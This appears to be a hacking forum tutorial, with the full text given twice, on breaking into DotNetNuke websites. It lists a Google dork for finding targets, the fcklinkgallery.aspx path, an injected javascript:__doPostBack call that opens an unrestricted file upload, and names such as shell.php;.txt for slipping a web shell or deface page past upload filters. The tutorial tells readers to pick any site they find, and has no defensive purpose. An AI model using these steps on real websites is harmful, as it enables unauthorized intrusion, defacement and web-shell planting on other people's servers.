DNN hacking
Now here is another website hacking tutorial! But this is way too advanced that the previous one!
DNN is dot net nuke which is a CMS to build websites!
Q) What is this hack about?
A) Well there is a security hole in DNN which allows any attacker to upload data to the server. This way you can upload a shell to the server.
Steps:
1) Google dork for vulnerable websites : inurl:/tabid/36/language/en-US/Default.aspx
2) After searching the above dork in Google you will come across many sites, open anyone you like.
3)You will see /Home/tabid/36/Language/en-US/Default.aspx in the url .
4)Just replace it with /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx .
5)Now you will see a page titled *LINK GALLERY* Having some upload options.
6)Now Choose option File.
7) The inject the following javascript code in the Browser address bar javascript:__doPostBack('ctlURL$cmdUpload','')
Explanation for ctlURL$cmdupload : ctlurl is URL control function which opens the cmdupload option which allows attacker to upload a file.
Sometimes the Browser removes *JAVASCRIPT* from this command while copy-pasting, so after pasting the command in browser just check if the *Javascript* is still written there if it is not there write *javascript* before :__doPostBack('ctlURL$cmdUpload','')
so the command should always look like :
javascript:__doPostBack('ctlURL$cmdUpload','')
Now the "Choose file" option will come up.
9) Now choose file and select root click on "upload selected file", upload any html deface page or any shell.
10) Now you can view your file/shell at portals/0/uploadedfile.fileformat
11) Additional step : Well sometimes website admin changes the upload permissions and set a filter to the uploader so that u can just upload .jpeg/.jpg/.txt files.
To bypass this filter just rename the shell to
shell.php;.txt
shell.php;.jpg
or any other extension which is allowed
this way when you parse the request for the page/shell in the browser it will read upto .php only it wont read .txt as ";" sign ends the request
DNN is dot net nuke which is a CMS to build websites!
Q) What is this hack about?
A) Well there is a security hole in DNN which allows any attacker to upload data to the server. This way you can upload a shell to the server.
Steps:
1) Google dork for vulnerable websites : inurl:/tabid/36/language/en-US/Default.aspx
2) After searching the above dork in Google you will come across many sites, open anyone you like.
3)You will see /Home/tabid/36/Language/en-US/Default.aspx in the url .
4)Just replace it with /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx .
5)Now you will see a page titled *LINK GALLERY* Having some upload options.
6)Now Choose option File.
7) The inject the following javascript code in the Browser address bar javascript:__doPostBack('ctlURL$cmdUpload','')
Explanation for ctlURL$cmdupload : ctlurl is URL control function which opens the cmdupload option which allows attacker to upload a file.
Sometimes the Browser removes *JAVASCRIPT* from this command while copy-pasting, so after pasting the command in browser just check if the *Javascript* is still written there if it is not there write *javascript* before :__doPostBack('ctlURL$cmdUpload','')
so the command should always look like :
javascript:__doPostBack('ctlURL$cmdUpload','')
Now the "Choose file" option will come up.
9) Now choose file and select root click on "upload selected file", upload any html deface page or any shell.
10) Now you can view your file/shell at portals/0/uploadedfile.fileformat
11) Additional step : Well sometimes website admin changes the upload permissions and set a filter to the uploader so that u can just upload .jpeg/.jpg/.txt files.
To bypass this filter just rename the shell to
shell.php;.txt
shell.php;.jpg
or any other extension which is allowed
this way when you parse the request for the page/shell in the browser it will read upto .php only it wont read .txt as ";" sign ends the request